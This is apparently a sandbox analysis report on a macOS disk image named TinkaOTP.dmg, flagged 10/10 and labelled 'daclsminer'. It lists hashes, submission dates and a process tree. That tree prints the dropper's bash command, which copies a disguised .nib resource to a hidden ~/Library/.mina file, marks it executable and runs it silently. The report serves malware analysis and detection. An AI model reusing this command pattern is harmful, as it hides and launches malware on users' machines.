Overview

overview

10

Static

static

TinkaOTP.dmg

macos_amd64

10

Resubmissions

06-05-2023 12:48

230506-p126bahb92 1

06-05-2023 12:30

230506-pptd2ahb52 1

12-06-2021 11:09

210612-nqn9qdfdq2 10

12-06-2021 11:04

210612-h83qfce7ax 10

12-06-2021 10:49

210612-mkbljdyans 10

04-06-2021 11:41

210604-617hnrwhna 10

03-06-2021 22:37

210603-9ndgvgx33n 10

03-06-2021 17:09

210603-gxrvff2tan 10

03-06-2021 16:24

210603-lv4d7lhgcs 10

Analysis

  • max time network
    155s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 17:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TinkaOTP.dmg

  • Size

    6.2MB

  • MD5

    81f8f0526740b55fe484c42126cd8396

  • SHA1

    fe83d95afce63e935dbe22aef40a164cee34f4e5

  • SHA256

    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53

  • SHA512

    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10
daclsminer

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    1⤵
      PID:464
    • /bin/bash
      sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
      1⤵
        PID:464
      • /usr/bin/sudo
        sudo open /Volumes/TinkaOTP/TinkaOTP.app
        1⤵
          PID:464
          • /usr/bin/open
            open /Volumes/TinkaOTP/TinkaOTP.app
            2⤵
              PID:465
          • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            1⤵
              PID:466
            • /bin/bash
              /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
              1⤵
                PID:469
                • /bin/cp
                  cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
                  2⤵
                    PID:470
                  • /bin/chmod
                    chmod +x /Users/run/Library/.mina
                    2⤵
                      PID:471
                    • /Users/run/Library/.mina
                      /Users/run/Library/.mina
                      2⤵
                        PID:472

                    Network

                    MITRE ATT&CK Matrix

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /Users/run/Library/.mina
                      MD5

                      f05437d510287448325bac98a1378de1

                      SHA1

                      fa3deb60b8a2eaa29a7dccf14bee6adae81f442f

                      SHA256

                      846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6

                      SHA512

                      466999585e7b09e729def6e13c719b656ba7ee9ca43ea32c8fb3a6177de81a75caf9bd5eb0c0ac172c2b7fea3c1aa57d10349ff98aac472fe2ffafde8cd30165

                      Download Submit